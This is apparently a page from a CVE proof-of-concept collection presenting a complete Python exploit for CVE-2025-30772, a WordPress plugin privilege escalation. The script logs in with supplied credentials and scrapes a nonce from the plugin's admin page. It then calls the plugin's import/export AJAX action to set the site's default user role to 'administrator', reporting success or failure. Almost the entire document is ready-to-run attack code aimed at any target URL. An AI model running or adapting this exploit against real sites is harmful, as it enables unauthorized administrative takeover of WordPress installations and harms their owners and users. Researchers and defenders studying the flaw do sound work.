4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-30772
README.md
Rendering markdown...
POC / CVE-2025-30772.py PY
⬇ Raw GitHub ✕ Close 
import requests
import argparse
import re
import sys



#by Nxploited | Khaled Alenazi,

requests.packages.urllib3.disable_warnings()

def create_session():
    session = requests.Session()
    session.verify = False
    return session

def authenticate(session, base_url, username, password):
    login_endpoint = f"{base_url}/wp-login.php"
    payload = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0'
    }
    response = session.post(login_endpoint, data=payload, headers=headers)
    if not any('wordpress_logged_in' in c.name for c in session.cookies):
        sys.exit("[!] Login failed.")
    print("[+] Authenticated")

def extract_nonce(session, base_url):
    page_url = f"{base_url}/wp-admin/admin.php?page=wpclever-wpcuf&tab=uf"
    response = session.get(page_url)
    match = re.search(r'"nonce":"(.*?)"', response.text)
    if not match:
        sys.exit("[!] Nonce not found.")
    print(f"[+] Nonce: {match.group(1)}")
    return match.group(1)

def send_exploit(session, base_url, nonce):
    endpoint = f"{base_url}/wp-admin/admin-ajax.php"
    payload = {
        'action': 'wpcuf_import_export_save',
        'name': 'default_role',
        'rules': '"administrator"',
        'nonce': nonce
    }
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    response = session.post(endpoint, data=payload, headers=headers)
    if "Done!" in response.text:
        print("[+] Exploit executed successfully")
    else:
        print("[!] Exploit failed")
        print(response.text)

def main():
    parser = argparse.ArgumentParser(description="WordPress Privilege Escalation Exploit - CVE-2025-30772 # By Nxploited | Khaled ALenazi,")
    parser.add_argument("-u", "--url", required=True, help="Target base URL")
    parser.add_argument("-un", "--username", required=True, help="WordPress username")
    parser.add_argument("-p", "--password", required=True, help="WordPress password")
    args = parser.parse_args()

    session = create_session()
    authenticate(session, args.url, args.username, args.password)
    nonce = extract_nonce(session, args.url)
    send_exploit(session, args.url, nonce)

if __name__ == "__main__":
    main()